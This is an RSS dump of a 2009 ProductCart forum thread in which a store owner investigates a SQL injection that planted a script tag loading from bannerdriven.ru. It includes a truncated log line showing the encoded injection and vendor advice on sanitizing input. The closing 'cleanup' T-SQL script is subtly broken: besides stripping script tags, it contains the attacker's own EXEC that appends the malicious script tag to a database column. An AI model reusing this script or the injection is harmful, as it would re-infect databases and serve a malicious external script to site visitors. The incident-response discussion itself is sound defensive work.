ProductCart Shopping Cart Software Forums : SQL injection victim? https://forum.productcart.com/ Copyright (c) 2006-2013 Web Wiz Forums - All Rights Reserved. Mon, 13 Apr 2026 12:49:11 +0000 Tue, 06 Oct 2009 15:25:42 +0000 http://blogs.law.harvard.edu/tech/rss Web Wiz Forums 12.04 360 https://forum.productcart.com/RSS_post_feed.asp?TID=3062 <![CDATA[ProductCart Shopping Cart Software Forums]]> https://forum.productcart.com/forum_images/pc_logo_50.png https://forum.productcart.com/ <![CDATA[SQL injection victim? : I have written a little SQL Query...]]> https://forum.productcart.com/sql-injection-victim_topic3062_post11561.html#11561 Author: stsomeware
Subject: 3062
Posted: 06-October-2009 at 3:25pm

I have written a little SQL Query to clean up our database after an attack. I cannot guarentee it will work for anyone else, but I have run it on 2 separate ProductCart stores that I work with and it worked just fine without losing any data. You will just need to change the <script src=http://www.bannerdriven.ru/ads.js></script>
 to the link that has been injected into your database.
 
Here it is:
 

DECLARE @T varchar(255), @C varchar(255);

DECLARE Table_Cursor CURSOR FOR

SELECT a.name, b.name

FROM sysobjects a, syscolumns b

WHERE a.id = b.id AND a.xtype = 'u' AND

(b.xtype = 99 OR

b.xtype = 35 OR

b.xtype = 231 OR

b.xtype = 167);

OPEN Table_Cursor;

FETCH NEXT FROM Table_Cursor INTO @T, @C;

WHILE (@@FETCH_STATUS = 0) BEGIN

EXEC(

'update ['+@T+'] set ['+@C+'] = left(

convert(varchar(8000), ['+@C+']),

len(convert(varchar(8000), ['+@C+'])) - 6 -

patindex(''%tpircs<%'',

reverse(convert(varchar(8000), ['+@C+'])))

)

where ['+@C+'] like ''%<script%</script>'''

);

FETCH NEXT FROM Table_Cursor INTO @T, @C;

END;

CLOSE Table_Cursor;

DEALLOCATE Table_Cursor;

 

EXEC(

'update [' + @T + '] set [' + @C + '] =

rtrim(convert(varchar,[' + @C + ']))+

''<script src=http://www.bannerdriven.ru/ads.js></script>'''

);

 

EXEC(

'update ['+@T+'] set ['+@C+'] = left(

convert(varchar(8000), ['+@C+']),

len(convert(varchar(8000), ['+@C+'])) - 6 -

patindex(''%tpircs<%'',

reverse(convert(varchar(8000), ['+@C+'])))

)

where ['+@C+'] like ''<script src=http://www.bannerdriven.ru/ads.js></script>'''

);

]]> Tue, 06 Oct 2009 15:25:42 +0000 https://forum.productcart.com/sql-injection-victim_topic3062_post11561.html#11561 <![CDATA[SQL injection victim? : Hi Brian,Thanks for updating the...]]> https://forum.productcart.com/sql-injection-victim_topic3062_post11476.html#11476 Author: ProductCart
Subject: 3062
Posted: 25-September-2009 at 5:04pm

Hi Brian,

Thanks for updating the post with this information. It's a good reminder for everyone to make sure all database input is sanitized per the instructions on the following page from our WIKI:

http://wiki.earlyimpact.com/how_to/sanitize_strings

Sincerely,

Early Impact
]]> Fri, 25 Sep 2009 17:04:43 +0000 https://forum.productcart.com/sql-injection-victim_topic3062_post11476.html#11476 <![CDATA[SQL injection victim? : Found the problem. We had added...]]> https://forum.productcart.com/sql-injection-victim_topic3062_post11475.html#11475 Author: BrianRoden
Subject: 3062
Posted: 25-September-2009 at 4:00pm

Found the problem. We had added some code in the footer.asp to check the current category and work back up the tree to the top-level category, then insert banner ad code from an Excel file based on the top-level category. I failed to check the idCategory with validNum, which allowed the stuff after the semicolon to get through.
 
I do most of my development in ASP.net, using object data source and parameterized queries with stored procedures that check stuff on the back end.  Not used to doing it the classic ASP way.
]]> Fri, 25 Sep 2009 16:00:55 +0000 https://forum.productcart.com/sql-injection-victim_topic3062_post11475.html#11475 <![CDATA[SQL injection victim? : Found this page http://www...]]> https://forum.productcart.com/sql-injection-victim_topic3062_post11471.html#11471 Author: BrianRoden
Subject: 3062
Posted: 25-September-2009 at 3:15pm

Found this page
 
http://www.sophos.com/blogs/sophoslabs/v/post/1329
 
then searched yesterday's IIS log for this site for the string SET%20 and found this
 

2009-09-24 16:40:03 W3SVC6487 servername se.rv.er.ip GET /cart/pc/viewCategories.asp idCategory=2;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C4152452040542056 

(I've omitted the full string for security purposes)
 
I'll open a support ticket with the complete string


Edited by BrianRoden - 25-September-2009 at 3:17pm]]> Fri, 25 Sep 2009 15:15:45 +0000 https://forum.productcart.com/sql-injection-victim_topic3062_post11471.html#11471 <![CDATA[SQL injection victim? : The RSS feed is its own app in...]]> https://forum.productcart.com/sql-injection-victim_topic3062_post11470.html#11470 Author: BrianRoden
Subject: 3062
Posted: 25-September-2009 at 1:43pm

The RSS feed is its own app in ISS, with its own separate log files, new file each day. The last log file was from 9/18/09. Doesn't look like this was the vector, or we would have had an entry for yesterday. We know yesterday is when the problem started, because Thursday night's DB backup was clean and we were able to restore it to get the DB back to normal.
 
Searching the ISS log for the PC site, the first occurrence of bannerdriven.ru shows up at 4:40 p.m. yesterday. I'm going to keep digging.
]]> Fri, 25 Sep 2009 13:43:11 +0000 https://forum.productcart.com/sql-injection-victim_topic3062_post11470.html#11470 <![CDATA[SQL injection victim? : Yes, the query string that carries...]]> https://forum.productcart.com/sql-injection-victim_topic3062_post11469.html#11469 Author: ProductCart
Subject: 3062
Posted: 25-September-2009 at 1:29pm

Yes, the query string that carries the category ID would be the first thing to review. Incorrectly sanitizing a query string is normally the number one culprit for SQL injection.]]> Fri, 25 Sep 2009 13:29:09 +0000 https://forum.productcart.com/sql-injection-victim_topic3062_post11469.html#11469 <![CDATA[SQL injection victim? : Using GreyBeard&#039;s session...]]> https://forum.productcart.com/sql-injection-victim_topic3062_post11468.html#11468 Author: BrianRoden
Subject: 3062
Posted: 25-September-2009 at 1:21pm

Using GreyBeard's session saver add-in.
 
We've made minor mods to source code on some of our PC sites (we have 3). Rearranging layouts, changing the Continue Shopping button on the shopping cart page to go back to the category the user just bought from, instead of back to the home page.
 
We added an RSS feed as an ASPX app in a subfolder to display the newest products per category for people who want to subscribe to get updates on their craft of interest. It accesses the same DB and works off an URL that has a category ID passed in the query string. Wonder if someone used the RSS URL.
 
I'll check the ISS logs.
]]> Fri, 25 Sep 2009 13:21:39 +0000 https://forum.productcart.com/sql-injection-victim_topic3062_post11468.html#11468 <![CDATA[SQL injection victim? : Two of us posted at the same time...]]> https://forum.productcart.com/sql-injection-victim_topic3062_post11467.html#11467 Author: ProductCart
Subject: 3062
Posted: 25-September-2009 at 12:46pm

Two of us posted at the same time :-)

The idea is the same, as you can see. You need to review any modifications ever made to your ProductCart source code to ensure that they did not introduce a security issue.]]> Fri, 25 Sep 2009 12:46:19 +0000 https://forum.productcart.com/sql-injection-victim_topic3062_post11467.html#11467 <![CDATA[SQL injection victim? : Brian, we don&#039;t have any...]]> https://forum.productcart.com/sql-injection-victim_topic3062_post11466.html#11466 Author: ProductCart
Subject: 3062
Posted: 25-September-2009 at 12:43pm

Brian,

we don't have any reports of any vulnerabilities in ProductCart v3.51. In our experience, the number one source of security holes is custom code:

- have you modified any of the source code?
- are you running any add-on's not provided by Early Impact?

Since some of the information might be confidential, we recommend that you open a support ticket.]]> Fri, 25 Sep 2009 12:43:33 +0000 https://forum.productcart.com/sql-injection-victim_topic3062_post11466.html#11466 <![CDATA[SQL injection victim? : Hi,   You will need to get the...]]> https://forum.productcart.com/sql-injection-victim_topic3062_post11465.html#11465 Author: Hamish
Subject: 3062
Posted: 25-September-2009 at 12:43pm

Hi,  
You will need to get the database restored from a backup and investigate the logs to see if you can determine the source of the breach.We are not aware of any exploitable vulnerabilities in ProductCart v3.51 code.

If you have made modifications please make sure the data is sanatized correctly, see
- http://wiki.earlyimpact.com/how_to/sanitize_strings 

Also see
- http://wiki.earlyimpact.com/productcart/securityrec#stores_using_a_ms_sql_database

I would also recommend checking that no other files on the site have been modified.

Hamish


Edited by earlyimp - 25-September-2009 at 12:45pm]]> Fri, 25 Sep 2009 12:43:20 +0000 https://forum.productcart.com/sql-injection-victim_topic3062_post11465.html#11465